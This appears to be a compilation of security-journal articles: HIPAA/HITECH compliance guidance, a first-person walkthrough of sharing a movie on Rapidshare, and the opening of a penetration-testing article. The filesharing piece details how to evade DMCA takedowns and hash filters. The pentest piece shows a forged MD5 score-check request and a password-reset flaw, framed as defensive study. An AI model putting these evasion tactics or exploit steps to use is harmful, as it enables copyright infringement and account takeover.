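A simple worked example of the impact-times-likelihood idea is sketched below. The 1-to-5 scales and the ratings given to the two scenarios are assumptions chosen for illustration, not values from HHS or NIST guidance.

```java
// Minimal illustration of qualitative risk scoring: risk = likelihood x impact.
public class RiskScore {
    static int score(int likelihood, int impact) {   // each rated 1 (low) to 5 (high)
        return likelihood * impact;                  // yields a score from 1 to 25
    }

    public static void main(String[] args) {
        // Single-physician office: one standalone system, little exposure
        System.out.println("Small practice : " + score(2, 3));
        // Large provider on a health information exchange: many users and systems
        System.out.println("Large provider : " + score(4, 5));
    }
}
```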

Establish an information risk management program which allows your organization to address strategic and technical risks to information security.

Risk management: Guidance

The HHS Office for Civil Rights (OCR) published draft guidance on risk assessments to help healthcare organizations understand what is expected of them in doing a risk analysis of their patients’ PHI.[10] The HHS Office of the National Coordinator (ONC) also produced a security practice guide for small healthcare practices[11] that serves as a primer for healthcare providers who need to understand the basic security considerations relevant to their practices. The guidance material also includes a number of references to more detailed information and further guidance.

The OCR calls risk analysis the “first step” to identifying and implementing safeguards that comply with and carry out the standards and implementation specifications in the HIPAA security rule.

People, process, and technology: Key elements of security and compliance

Companies handling Protected Health Information/Personally Identifiable Information (PHI/PII) should perform an architectural and program review to understand how their existing controls can be utilized to address identified risks before making new investments. When determining the best information protection strategy, they should review their current healthcare infrastructure to understand existing measures and processes. There may be ways to optimize, reduce costs, or minimize upcoming investments. For every compliance initiative there are technologies that promise to provide the easiest method of complying with the requirements. Most likely, companies already have some of the technologies in place to satisfy other compliance initiatives such as the Payment Card Industry Data Security Standard (PCI DSS), the Sarbanes-Oxley Act (SOX), or the Gramm-Leach-Bliley Act (GLBA). Before moving forward, determine a strategy to address compliance requirements using both technological and strategic solutions. Not all requirements can be solved by technology; some are best solved with organizational and operational processes.

Develop an information protection strategy for security and compliance with the right combination of people, processes, and technologies to address your organizational risks.

Data security: Common thread across the industry

Healthcare organizations face a great variety of risks to the security and confidentiality of data and information. Applications and their supporting infrastructure create efficiency, but can also create conflicts between data sharing and data security and confidentiality. The prudent healthcare enterprise in the process of automating application modules must consider system-wide security and confidentiality across application boundaries.

Each organization must determine the level of security and confidentiality for the varying categories of information, including what access to each category of information is appropriate for a user’s job function.

Before analyzing security controls, take a step back to understand what data is actually needed to support the business, how that data must be shared, and where that data is stored. Look at operations, the flow of data into, throughout, and outside of the organization, and the risks associated with the entity’s current business model. This will result in an understanding of the exposures that the data faces, allowing prioritization of security measures.

The risk analysis guidance released by OCR also provides example questions adapted from NIST Special Publication (SP) 800-66. These are examples healthcare organizations could consider as part of a risk analysis.

·      Have you identified the electronic protected health information (e-PHI) within your organization? (this includes e-PHI that you create, receive, maintain, or transmit)

·      What are the human, natural, and environmental threats to information systems that contain e-PHI?

·      What are the external sources of e-PHI? (for example, do vendors or consultants create, receive, maintain, or transmit e-PHI)

To understand organizational privacy, security, and confidentiality needs, determine:

·      Which employees should have access to PHI/PII information to perform their jobs

·      Mechanisms to educate and compel (via enforcement) individuals to keep sensitive information confidential

·      Rules for the release of health-related information to third parties

·      Physical barriers and system deterrents to secure data and data processing equipment against unauthorized intrusion, corruption, disaster, theft, and intentional or unintentional damage

·      The location of sensitive data, the data lifecycle, and regulatory requirements which impact the data

Breach response: Before and after

The HITECH Act outlines a number of privacy and security provisions directly applicable to covered entities and business associates regarding breach notification, extending the requirements of HIPAA, and increasing enforcement and penalties. Sections 13402(e)(3) and 13402(e)(4) require that covered entities notify the HHS Secretary immediately of any breaches of unsecured PHI affecting 500 or more individuals and that the Secretary make these breaches publicly known on the HHS website. HITECH Breach Notification Guidance[12] provides detailed steps on how to report a breach.

HITECH defines breach as “the unauthorized acquisition, access, use, or disclosure of protected health information which compromises the security or privacy of such information, except where an unauthorized person to whom such information is disclosed would not reasonably have been able to retain such information.” The Act includes two important exceptions to this definition for cases in which (1) the unauthorized acquisition, access, or use of PHI is unintentional and made by an employee or individual acting under authority of a covered entity or business associate if such acquisition, access, or use was made in good faith and within the course and scope of the employment or other professional relationship with the covered entity or business associate, and such information is not further acquired, accessed, used, or disclosed; or (2) where an inadvertent disclosure occurs by an individual who is authorized to access PHI at a facility operated by a covered entity or business associate to another similarly situated individual at the same facility, as long as the PHI is not further acquired, accessed, used, or disclosed without authorization.[13]

Data breach notification requirements are imposed by a number of state and federal privacy laws. In addition to meeting regulatory requirements for proactive data security, you must also consider reactive notification obligations in the event of a data breach. These obligations need to be considered in advance of, and not after, a data breach.

·      Plan for Breach Detection: To ensure early breach detection, consider aggressive and ongoing monitoring programs that may range from IT audits to checking patient health records for inconsistencies.

·      Plan for Breach Response: A detailed breach response plan should be in place. Consider vendors who provide turnkey notification services, including call centers and postal mail, which have experience creating tailored notification and advisory services for breach victims with special needs, such as age, mental health issues, or physical disabilities. Remediation services for breach victims will help preserve public trust in your organization.

However, these notification procedures can largely be avoided if the PHI has been secured through one of a number of methodologies or technologies. HHS has issued guidance that specifies methodologies and technologies whose use renders information sufficiently unusable. Essentially, use of these methodologies creates a safe harbor, which results in covered entities and their business associates not being required to go through the notification procedures because the information breached is considered secured (secured PHI is unusable, unreadable, or indecipherable to unauthorized individuals).
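
As a purely illustrative sketch of what rendering PHI unusable looks like in code, the following Java fragment encrypts a sample record with AES-GCM. The algorithm choice, key handling, and sample data are assumptions for the example; consult the HHS guidance itself for the approved methodologies and the key management they require.

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;

// Sketch: encrypt a record so that, without the key, the stored bytes are
// unusable, unreadable, and indecipherable to unauthorized individuals.
public class SecurePhi {
    public static void main(String[] args) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey key = kg.generateKey();             // the key itself must be managed separately

        byte[] iv = new byte[12];
        new SecureRandom().nextBytes(iv);             // fresh IV for every record

        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv));
        byte[] ciphertext = cipher.doFinal(
                "patient: Jane Doe, MRN 12345".getBytes(StandardCharsets.UTF_8));

        System.out.println("Ciphertext length: " + ciphertext.length + " bytes");
    }
}
```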

Regulatory drivers: Changing regulations at the federal and state level

Constantly changing healthcare laws and regulations pose a governance risk. Does your organization have a strategy to identify and monitor its exposure? If your organization does not have a thorough understanding of compliance requirements, it will not be able to efficiently leverage its security initiatives to tackle ongoing regulatory demands. Remember that security does not equal compliance. So be aware of the requirements, solicit feedback and interpretation from outside experts, and develop a protection framework to meet security standards as well as compliance requirements. As an organization handling PHI, you should also have a framework in place to keep abreast of the changes to applicable regulatory requirements.

Sustain compliance

Sustaining compliance requires identifying and remediating the IT infrastructure, governance, and communication problems on an ongoing basis. It requires enormous effort on the part of those charged with compliance, as well as coordination of the business processes and IT resources used to achieve compliance. Specifically, organizations must create a culture of compliance maintenance. This may require an organizational shift from a project mentality to a program mentality that will bring together the risk, governance, and compliance initiatives, helping to pave the way for a converged compliance management program.

In developing a compliance plan for data security, following an integrated framework that addresses security, privacy, risk, and compliance will result in a more manageable program that allows more efficient compliance efforts.

Information protection evaluation checklist

Here is a list of questions that can help get you started with building the health information protection framework around the key elements.

Strategy and Awareness

·      Have you developed a health information protection strategy that encompasses the key elements of HIPAA and the HITECH Act?

·      Have you performed a recent assessment to determine your compliance posture with the HIPAA Privacy/Security Rule?

·      Have you prepared security awareness programs to promote the education of Health Information Privacy and HITECH requirements within your organization?

Information Security and Privacy 

·      Have you reviewed and updated Notice of Privacy Practices to reflect changes in privacy and security policies?

·      Have you made updates to your security policies and program to reflect the changes in regulatory standards?

·      Have you evaluated the restrictions on the sale of PHI and on marketing imposed by the HITECH Act?

Security Technology and Operations

·      Have you developed a detailed Breach Notification Policy that complies with HITECH and any state law counterpart to the new federal breach notification provisions?

·      Have you evaluated access management if using EHR (individual’s right to access) according to the HITECH guidance?

Risk Management

·      Have you expanded your Business Associate Inventory to include vendors and other related services?

·      Have you updated Business Associate Agreements to include expanded new requirements?

Conclusion

While data security requirements such as HIPAA and HITECH impose mandatory requirements, many health practitioners and organizations recognize that protecting healthcare information and ensuring consumer privacy is also just good business practice that leads to satisfied consumers. The increasing exchanges of health information bring new challenges in privacy and security as the industry becomes more and more interconnected. The security and privacy of patient data is a key element in creating a secure healthcare information infrastructure. The magnitude, complexity, and dynamic nature of developments affecting the exchange of health information demand a broad and flexible information protection strategy. This information protection strategy must encompass risk management and governance policies so that people, processes, and technologies can provide for the growing security and privacy requirements for proper treatment of health information.

About the Authors

Bindu Sundaresan, CISSP, CISM, CEH, is a senior information security professional with AT&T Consulting Solutions, Security Consulting Services. She has a B.S. in Electrical Engineering and an M.S. in Telecommunications. She has experience with providing compliance expertise including HIPAA, HITECH, SOX, PCI and FFIEC for a variety of Fortune 500 clients. She may be reached at bindu.sundaresan@att.com.

Carisa Brockman, CISSP, CISA, is a senior information security professional with AT&T Consulting Solutions, Security Consulting Services. She has a B.A. in History and has experience providing Fortune 500 clients across financial, healthcare, retail, and public sector industries compliance expertise relative to information security and privacy. She may be reached at carisa.brockman@att.com.

 

 

A Reality of Modern Filesharing

By Richard Abbott

 

This paper describes Rapidshare.com, which has become the undisputed king of one-click hosting. The author is going to show how to share files by actually doing so.

 

In the beginning there was Napster, and a bunch of kids started swapping mp3s. A tiny little band called Metallica then started the war, the war between the kids wanting to share files freely and the lawyers trying to maintain control over their clients’ intellectual property. The resulting arms race has created a plethora of sharing technologies. A decade later, the vast majority of filesharing occurs via two distinct schemes: the bittorrent protocol and one-click hosting services. This paper describes the latter, specifically Rapidshare.com, which has become the undisputed king of one-click hosting,[14] and I am going to show you how to share files by actually doing so.

File sharing cannot be ignored. There are three scenarios where even the most pro-copyright/anti-sharing technology professional requires an understanding of filesharing technology:

1.     Nearly every corporate network has some sort of anti-filesharing policy. Network administrators must therefore keep abreast of the technology if they hope to enforce these policies.

2.     Every organization owns some sort of intellectual property and may one day discover this property being improperly distributed via filesharing. The organization’s in-house technology team will be the first experts consulted. They should be able to quickly identify whether such sharing is actually occurring and offer practical advice on how to deal with the situation.

3.     Filesharing is an area of rapid development in privacy, practical encryption, and overall security. Filesharing tools can be put to many legitimate uses to reduce costs or solve distribution headaches.

Whatever your opinion of how the technology is used, everyone should keep up to speed.

Hosting services are not peer-to-peer networks 

A peer-to-peer (p2p) network exists as a web of interconnected computers (peers) run by persons wanting to share files with others running similar software. These networks function efficiently only where many connected users share identical copies of a particular file. This allows swarm downloading[15] whereby a peer downloads a file simultaneously from multiple peers. The downloading of rare, unique, or simply unpopular files is difficult and places heavy bandwidth requirements on those who do choose to share. Because files within p2p networks are stored only on user machines, when a user is offline, the files he or she was sharing are also offline. Where only one user is sharing a particular file, that file is only available so long as that user remains online. Lastly, p2p leaves participants open to observation by copyright investigators.

File hosting services function very differently. Hosting services allow users to upload files to a cloud of servers scattered among multiple data centers. Each file is assigned a unique URL that is provided to the original uploader. Thereafter this link can be used to download the file. There are no direct file transfers between sharers. Sharers instead trade the URL links to their uploaded files. This structure has huge advantages over p2p networking. Download speeds are no longer limited by the speed of the uploader’s internet connection. Popularity of files is irrelevant, as all files remain online and can be simultaneously downloaded by hundreds. Most importantly, uploaders need no longer remain connected in order to share. These improvements make one-click hosting an exponentially more powerful sharing tool.

To learn, one must do

Lectures might work well for law schools, but technology requires real-world participation. In this article I am going to show you how to share files by actually doing so. I am going to take a large file (300mb) and share it via the hosting service Rapidshare. Anyone reading this article will be able to download and view the video easily. The file is called “A_Wolverine_Goes_Fishing.mpeg.”[16] If discovered, this video could be subject to a takedown order under the Digital Millennium Copyright Act (DMCA). To avoid takedown, I am going to take steps to hide the file from copyright investigators while still freely publicizing its location to filesharers and to those reading this article. Feel free to download and reassemble this file from any of the available links.

Step one: Prepping the file 

At three hundred megabytes (300mb) the file is too big. Rapidshare has a 200mb per file limit if the file is to be made available to non-subscribers.[17] To get around this I am going to cut the file into two 150mb pieces. For reasons I will explain later I am also going to encrypt the file. In the file sharing community the rar file format is used for both these tasks. I am using a Linux tool (Figure 1) but Windows users can perform the same tasks via WinRAR. Mac users ... I don’t know much about Macs, but I am sure there is a tool out there somewhere.

Figure 1 –  Splitting and encrypting the file to be transferred.

I now have two 150mb files. Together they are encrypted with the keyword “Rabbits,” which downloaders will need when reassembling the file. It is not unusual to see Blu-ray movies cut into hundreds of individual rar files, but such packages can take days to prepare and upload.
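
Purely as a sketch of this prep step (assuming the proprietary rar command-line archiver, the console counterpart to WinRAR, is available; the filenames and password mirror this walk-through), the split-and-encrypt can be scripted in a few lines of Python:

import subprocess

# -v sets the volume size and -hp encrypts both file data and archive headers
# with the given password; rar typically names the volumes .part1.rar, .part2.rar
subprocess.call([
    "rar", "a",
    "-v150m",                              # split into 150mb volumes
    "-hpRabbits",                          # the encryption keyword used above
    "A_Wolverine_Goes_Fishing.mpeg.rar",   # archive base name
    "A_Wolverine_Goes_Fishing.mpeg",       # the 300mb source file
])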

Step two: Uploading the files 

I have chosen to share my files via Rapidshare.com. There are other services that are arguably better/faster/cheaper, but Rapidshare is currently top dog. The upload process is simple. From the Rapidshare website I click the upload button and select the files I want to share. Rapidshare then assigns each file a unique link, which can then be used to download the files (Figure 2).

These are the links assigned to my files by Rapidshare:

http://rapidshare.com/files/268545102/A_Wolverine_Goes_Fishing.mpeg.part1.rar

http://rapidshare.com/files/268556496/A_Wolverine_Goes_Fishing.mpeg.part2.rar

Figure 2 – Uploading files

Step three: Publishing the links 

There are many websites dedicated to link swapping. Most of these are run on small budgets and are supported by a combination of advertising and donations. Most take the form of discussion forums where uploaders can publish their links and receive comments from downloaders. As file hosting services do not allow users to search or browse files directly, these sites provide the needed communications link between uploaders and downloaders. Some of these sites are invitation-only affairs, while others are open to the public. I am not going to draw unwanted attention to the site I used for this exercise, but it was not very hard to find.

Notice that my posted links are not those assigned by Rapidshare (Figure 3). This is a ploy by me to avoid the robot armies of the copyright police.

If I had posted the actual Rapidshare links, they would have been discovered too easily. Every few days this website is visited by Google’s spider, which indexes any new posts. After such a visit, any investigator googling “rapidshare wolverine” would find my links and have my files removed via a DMCA takedown notice. Some websites try to limit this indexing via a robots.txt file, but many spiders do not respect such requests. Some advanced spiders will actually download my files from Rapidshare and compare them to a list of target files. Copyright investigators rely on these automated systems and rarely inspect websites in person. My goal as an uploader is to make those investigators work for their supper by hiding my post from automated detection. This increases the life expectancy of my files by reducing the chance that they will be discovered by lazy copyright investigators.

Accepting that my post would be visible to spiders, I had to remove the keywords ‘rapidshare’ and ‘wolverine’ within my links. There are a great many ways to protect links from discovery. By far the simplest method is via the use of a URL redirection service. Sometimes improperly described as URL shorteners, these services redirect browsers from one URL to another. They are not proxies in that they do not handle traffic. They simply respond to one URL with another. If you use Twitter then you are probably familiar with Bit.ly or TinyURL, but in this case I used a service called Lix.in. I submitted my Rapidshare links to Lix.in and was provided unique Lix.in links. These new links do not contain the keywords Rapidshare or wolverine and can therefore be indexed by spiders without worry.

There are other advantages to URL redirection. Some determined spiders will actually follow redirected links to discover the true links they mask. Lix.in allows me to insist on an image-recognition (captcha) test prior to divulging my actual Rapidshare link (Figure 4). Spiders cannot read captchas, so they will not be provided with my true links. With their automated tools stymied, only the most determined investigator will discover my links.

If my links were detected, the next step for any investigator would be to google the text of those links to discover where else on the internet they have been posted. If I were to post identical links on multiple websites the investigator would be able to follow my path across the filesharing community and perhaps discover sharing communities that would otherwise have gone unnoticed. Lix.in provides yet another frustration.

By submitting a Rapidshare link multiple times I can use Lix.in to generate multiple unique links. I can then post unique Lix.in links in multiple locations without worry that an investigator will be able to follow my tracks. I meant it when I said that I wanted investigators to work for their supper.

Step four: Walking away 

Now that the files are uploaded and the links published, I walk away. Unlike file sharing via p2p networks there is no need for me to remain online. The files now live on Rapidshare’s servers. They can be downloaded by anyone at any time and at whatever speed his home connection will allow.

That’s it. That’s how large files are shared. Please feel free to download them via the Rapidshare links. Click the “free user” option. Once you have both files you can reassemble them via WinRAR. The encryption key is always “Rabbits.”

Avoiding Rapidshare’s internal security 

Rapidshare maintains a growing database of MD5 hashes taken from files that have been reported as copyright violations. Any file matching a hash in that database is automatically removed (Figure 5).[18] In theory this combats illegal filesharing by preventing users from repeatedly uploading illegal content. In reality this is only a minor inconvenience as the system can only target files with a matching hash. I did not upload an actual movie file. I uploaded an encrypted archive containing a movie file. Any alteration to the archiving/encryption process would radically alter the hash values of the resulting files and render them invisible to hash-based detection measures.
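
For reference, the fingerprint such a filter compares against its blacklist is just the MD5 digest of the file’s bytes; a minimal Python sketch (standard library only, filename taken from the walk-through):

import hashlib

def md5_of_file(path, chunk_size=1024 * 1024):
    # Read in chunks so even very large rar volumes can be fingerprinted
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

print(md5_of_file("A_Wolverine_Goes_Fishing.mpeg.part1.rar"))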

These are my files and their MD5 hash values:

A_Wolverine_Goes_Fishing.mpeg         300 MB   c80f4a6b2b37dddce36e9bc436b07a65

A_Wolverine_Goes_Fishing.mpeg.part1.rar 150.5 MB      fb81fd894abd17efdf1a6cae08ea1564

A_Wolverine_Goes_Fishing.mpeg.part2.rar 150.3 MB      9af068ec20f86473a2bec9ad1e37a29e

If I were to change the rar encryption key to “Rabbits2” the result would be:

A_Wolverine_Goes_Fishing.mpeg         300 MB   c80f4a6b2b37dddce36e9bc436b07a65

A_Wolverine_Goes_Fishing.mpeg.part1.rar 150.5 MB      ebec7768835b3417567057a49befc326

A_Wolverine_Goes_Fishing.mpeg.part2.rar 150.3 MB      9eb0d898ee6e3c280301279b850a5a19

Same file names, identical sizes, but the rar files now have radically different hash values. There is talk of file hosting services taking steps to look inside rar archives. File encryption renders such inspections impossible, and so is disallowed by services such as MediaFire.[19] Even if automated systems were deployed to open archives, there is no reason to expect that the files contained within would have stable hashes. Even an imperceptible alteration to a media file will change its hash. It would only take a slight tweak of the resolution, codec, length, or even metadata to again render the file invisible to automated detection. Automated removal systems may placate lawyers who demand that file hosts remove every instance of a particular file within their systems, but their impact on improper sharing is little more than an annoyance.

One-click filesharing on your network

Companies who permit employees to access the Internet universally adopt an anti-filesharing policy. When it comes time to enforce such a policy, and perhaps discipline an employee for violating it, one must have both a clear definition of filesharing and an objective test for whether it has actually occurred.

Network administrators often confuse the mere browsing of websites that discuss filesharing with the sharing itself. In the case of Rapidshare and similar services, the actual uploading and downloading of shared files only ever occur between the participant and Rapidshare’s servers. An employee caught browsing a website where links are traded has not actually engaged in filesharing per se. Similarly an employee accessing Rapidshare might do so for non-sharing purposes such as the backing up of personal files, or sharing material not subject to copyright limitations such as open source software. The touchstone should be large amounts of traffic to or from Rapidshare’s servers for which the employee cannot provide a reasonable explanation.

Anti-filesharing policies are based on a fear of liability, a fear that the employer may be sued for copyright violations occurring via its network. In the case of peer-to-peer sharing that fear is justified, but for Rapidshare the risk is more complex. One-click hosting services generally do not maintain download records. Many consider doing so an invasion of their customers’ privacy, a form of wiretapping. Rapidshare has made a singular point of asserting that it does not maintain such records.[20] Rapidshare only maintains records of uploads. So the liability risk where an employee has only downloaded material is minuscule. This may be splitting hairs, but with an employee’s job on the line all decision makers must have a clear picture of the situation.

Dealing with the discovery that your material is being shared

File sharing is very difficult to stop. The knee-jerk reaction is to summon the lawyers and declare war on the Internet. That costs money and does little to stop the sharing. Before doing anything else, spend ten minutes answering these two questions:

What type of sharing is this?

There are countless methods for sharing files, but the big two are one-click hosting and bittorrent. The touchstone is the type of file you are invited to download. If it is an executable file (*.exe, *.bat, etc.) you are almost certainly dealing with a scam. Files shared through one-click services will be in whatever format they were uploaded, but are normally compressed into archive formats (*.rar, *.7z), split into multiple files (*.001, *.002), or both (*.rar.001, *.part1.rar). You may also run into download container files (*.rsdf, *.ccf, and *.dlc). These files contain links to one-click hosting but require additional software to access them. If the filename ends with *.torrent, then you are dealing with sharing via bittorrent.

Is this real?

There are a great many scams out there trying to sell access to filesharing services. Until you actually download and inspect the files, you cannot be sure that you are not dealing with a scam. The standard scam involves a search engine that will always return positive results. NowDownloadAll.com is a good example (Figure 6). Apparently, thousands of people have downloaded one of my files via their service and I can too for a small membership fee.

Actual filesharing services never demand money from new users. They all have “free user” options. If a website asks you for money or personal information prior to download, you are dealing with a scam.

Scams may seem trivial, but I have seen lawyers pull out all the stops under the false belief that their client’s material was being sold via these websites. Recognizing the scam before the lawyers get involved saves time and money. Being able to demonstrate to your boss that your company’s material is not actually being shared saves blood pressure.

Calculating a response

Once you are confident that sharing is occurring, the big question will be whether you want to respond yourself or farm the work out to a copyright enforcement company. There are many companies out there offering their services “for free.” Be extremely careful when dealing with these. Whether or not they are appropriate will turn on the type of sharing you are looking to combat.

Most copyright enforcement companies base their business models on commissions. They send cease and desist letters to filesharers along with offers to settle for a fee, usually in the hundreds of dollars. The company takes a commission ranging from thirty to sixty percent and forwards the balance to the copyright holder. While this is a profitable business model when deployed against peer-to-peer sharing, it is not effective against one-click hosting. Peer-to-peer sharing involves a large number of uploaders (seeders) that announce themselves to the world via their IP addresses. This creates a target-rich environment for cease and desist mailings. One-click hosting is altogether different. The IP addresses of those involved cannot be discovered directly. They are only knowable by the hosting services which are not going to turn over customer information absent a court order. Fighting one-click sharing will therefore never be a profitable business. Any offer to do so on commission must be treated with suspicion.

While direct profits are not on the table, cost-effective countermeasures do exist. Hosting services are still obligated to respond to DMCA takedown requests. By consistently monitoring the links-swapping community, one can discover and report offending links quickly, thereby frustrating uploaders. My demonstration earlier should give you an idea of what this entails. Many links-swapping websites are acutely aware of their role in filesharing. Many will respond to requests for links to be removed. Most maintain blacklists of “forbidden content,” the sharing of which is disallowed. Posts containing links to such material will be actively removed and the relevant posters sanctioned. A few polite emails to those administering the more popular websites will do more in ten minutes than a year’s worth of lawsuits.

The effectiveness of these tactics cannot be measured directly, which is why the work is best kept in-house. It is nearly impossible to measure exactly how many times a file has been downloaded. It is equally impossible to measure how many downloads are prevented through the removal of a file. A successful campaign is one that removes links so quickly that the uploaders grow frustrated and discontinue, resulting in fewer active links. Therefore the successful campaign will over time discover fewer links and have fewer results to report. This paradox makes performance very difficult to measure. Only through close in-house supervision can one be sure that the campaign remains cost effective.

Legitimate one-click filesharing

While at law school I was once asked to distribute a large video file (400mb) to fifty different people. We have all been there. A big file and an email list of recipients who do not know an IP address from a postal code. It was suggested that I “just burn some CDs.” That wasn’t going to happen. The standard geek response to this problem is to set up a file server, but that is always a headache. When you need to share a file with a large group of people, then you need filesharing tools, and the one-click hosts are the answer. Upload the file once and distribute the links via email. Each recipient can then download the file at his own pace, no servers or special software required.

In a business environment few downloaders want to view ads or deal with suspicious “free user” options on filesharing websites. Rapidshare’s Trafficshare program addresses these concerns. Anyone following a Rapidshare link to a file assigned to Trafficshare will download it from Rapidshare’s servers without having to click on anything. The bandwidth costs are covered by the uploader at 4¢ per gigabyte. This is much like basic hosting but lacks the headaches of maintaining a server. I use Trafficshare on a daily basis to transfer files where the recipient cannot handle large email attachments. It is cheap, convenient, and a perfectly legitimate use of filesharing technology.

This is only a snapshot

The one-click hosting community is constantly changing. The various services involved are constantly introducing or retracting rewards programs, security measures, and new subscription models. Sometimes these changes are market-based, but are often made in response to perceived legal threats. On June 25th Rapidshare was in the process of revamping both its subscription plans and rewards programs.[21] Some are predicting that this will topple Rapidshare in favor of other services. While the specifics will constantly change, the basic structures behind one-click hosting will remain.

Links

—Trafficshare link to an image used in a previous version of this article - http://rapidshare.com/files/292603917/HostingDiagram_600.tif.html.

—Rapidshare links for “A_Wolverine_Goes_Fishing.mpeg” – http://rapidshare.com/files/268545102/A_Wolverine_Goes_Fishing.mpeg.part1.rar, http://rapidshare.com/files/268556496/A_Wolverine_Goes_Fishing.mpeg.part2.rar.

—Lix.in links for same – http://lix.in/-8871c1, http://lix.in/-7dc36.

—Comparison of one-click hosting services – http://en.wikipedia.org/wiki/Comparison_of_file_hosting_services.

This article has been adapted from “The Reality of Modern File Sharing,” The Journal of Internet Law, Volume 13 Number 5 (Nov ‘09).

About the Author

Although a member of the Bar in Oregon, Richard Abbott works as a privacy consultant out of Vancouver, British Columbia, Canada. Richard is active in both the Science and Technology and Intellectual Property sections of the ABA where he is an advocate of open source software and open security standards. Richard can be contacted via Oregonrabbit@hushmail.com.

 

 

 

Application Penetration Testing Versus Vulnerability Scanning

By Bil Bragg

 

This article demonstrates real-world examples of the different types of flaws found only through manual testing.

 

Abstract

Running a web application scanning tool against a website can find serious vulnerabilities. A more in-depth look through web-application penetration testing can reveal further interesting and exploitable vulnerabilities. This article demonstrates some real-world examples of the different types of flaws found only through manual testing.

 

Web application vulnerability scanners are good at finding certain kinds of vulnerabilities, such as SQL injection and cross-site scripting (XSS). Even then, they need to be configured correctly. One area that is often not scanned is the logged-in areas of websites. Manual web-application penetration testing can find trickier SQL injection and cross-site scripting issues, as well as logical issues. Examples of logical flaws would be unused but exploitable functions in a Flash file, or a password reset function that allows you to reset any user’s password.

This article will take you through several examples of vulnerabilities that were all discovered after vulnerability scanning had taken place. All the examples are from websites of a global retail company, which uses third-party design agencies to develop their brand websites. These websites often feature competitions, and all require user registration of personal details, usernames, and passwords. It was important to the company that personal data was protected, that competitions could not be abused, and that their reputation would not be tarnished by adverse publicity due to published flaws. The company ran their own web-application vulnerability scans, and then web-application penetration tests were performed.

Some free tools are used in this article, including the Web Developer and Tamper Data Firefox add-ons, the Fiddler2 web proxy, and the HP Flash decompiler SWF Scan. These are all listed at the end with links. Please note there are many tools that can be used to accomplish the same tasks.

Submit any high score

One of the websites had a Flash game, based on one of the company’s products. Visitors could play the game and post high scores. An inherent problem with Flash games is that they run on the client, and so information such as game scores will be sent from the client PC. Anything sent from the Flash client to the web server should be considered as untrusted and open to abuse.

The Flash game on this website posted XML text to a web service with the link (http://localhost/highscores.asmx). The web request by the Flash client can be seen by using a local web proxy such as Fiddler2, which will log all browser requests and server responses:

<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">

<soap12:Body>

<ScoreEnter xmlns="http://tempuri.org/">

<gameID>1</gameID>

<username>test</username>

<score>260</score>

<scoreCheck>8afcadbb42ba16254036ff823c5ee58e</scoreCheck>

</ScoreEnter>

</soap12:Body>

</soap12:Envelope>

Trying to post arbitrary high scores by just changing the score field (using Tamper Data) resulted in the web service returning an error. Tamper Data will pop up a window when you click submit, which allows you to change any of the information before you actually allow the data to be sent to the web server. As you can see, the web request contained a scoreCheck code. This code was used by the web server to verify that the score submitted was legitimate. When a tampered score is submitted, the server calculates its own hash; if it does not match the scoreCheck code, the score is rejected. The Flash game file, game.swf, was decompiled using SWF Scan (one of several tools that can do this). One of the Flash functions in the ActionScript code revealed how the scoreCheck was created:

private function getScoreCheck(arg0:String, arg1:Number) : String

{return MD5.encrypt(arg1.toString() + arg0);}

This shows that the scoreCheck value is the MD5 hash of the score combined with the username. The decompiler does not know the original names of the function arguments, so it has to number them, i.e., arg0, arg1, and so on. That arg0 is the username and arg1 is the score can be inferred from the calling code and a little guesswork. This knowledge was used to submit an excessive high score and a valid scoreCheck hash (the MD5 of “1000000rudeword”), by simply amending the request from the browser at the end of a game, again using Tamper Data:

<username>rudeword</username>

<score>1000000</score>

<scoreCheck>d439312e55dc6f5c07cfc828d0c55d71</scoreCheck>
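
A minimal Python sketch of how that forged scoreCheck is produced, mirroring the decompiled getScoreCheck() logic (the score rendered as a string, concatenated with the username, then MD5-hashed):

import hashlib

username = "rudeword"
score = 1000000
# Same construction as the decompiled ActionScript: MD5(score + username)
score_check = hashlib.md5((str(score) + username).encode()).hexdigest()
print(score_check)  # matches the scoreCheck value submitted above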

The impact of this issue would have been to the reputation of the organization and the product brand. The highest scorer would also have been given a prize.

There are many Flash applications on the web that are open to this kind of abuse, as Flash runs on the client-side. Many Flash applications use XML, AMF, or plain text to communicate with server-side pages. A scanner would not be able to logically determine that a field is a hash check. To find these, you need to view the conversations with a proxy such as Fiddler2, Burp, or a browser plug-in such as Tamper Data. The conversations, such as the first one above, can show which fields may be open to abuse.

Reset anyone’s password

Some of the websites share a user registration database between them, which has tens of thousands of personal details. The particular website being tested had the usual registration process where the user registers and chooses a username and password, and also enters an email address and postal address.

The website also had a password reset process, where a user can enter his email address on the ResetPassword.aspx page. The user is then sent an email which contains a link with a “k” parameter in it:

http://localhost/ResetPassword.aspx?k=7f092619-f9ad-4a3f-adce-de6f05b4f679

Clicking on this link showed the ResetPassword.aspx page, now with username and password fields (see Figure 1). The website expected you to enter your own username and new password. However, you could enter any username, and reset the password for that user. The “k” parameter did not seem to be used to validate the user. The page also helpfully lets you know if the username was valid, by showing the message: “no account found with that username.”

The impact of this was that someone could set the passwords for thousands of users, given that it is likely that the usernames could be found using a dictionary attack. These user details could then be accessed and targeted for spamming or identity theft.

Although this specific example is rare, links and actions that are only exposed through manual user interaction are common. Issues with password management on websites around forgotten passwords are also common. A scanner would need to be supplied with the link in the email initially, but even then would not be able to identify this logical vulnerability. The tester can manually discover links and actions by ensuring that all inputs are identified, including those in messages and emails sent from an application. You would then need to check fields that the system has generated and may therefore trust erroneously, such as the username field in this example.

Unused hidden web services

One website allowed visitors to register and upload pictures through a Flash client. The Flash client communicated with the web server using Adobe AMF (Action Message Format) through a gateway ASP.NET page (http://localhost/amf/gateway.aspx).

The decompiled main.swf Flash client (using SWF Scan) showed the web services used in an interface declaration. Some of these functions are shown below, some with very interesting names. These types of functions can be found by looking for the gateway.aspx link above, and searching for which web service calls are made using this, and then the functions that make these service calls.

public interface IWebsiteSixService

{

function IWebsiteSixService();

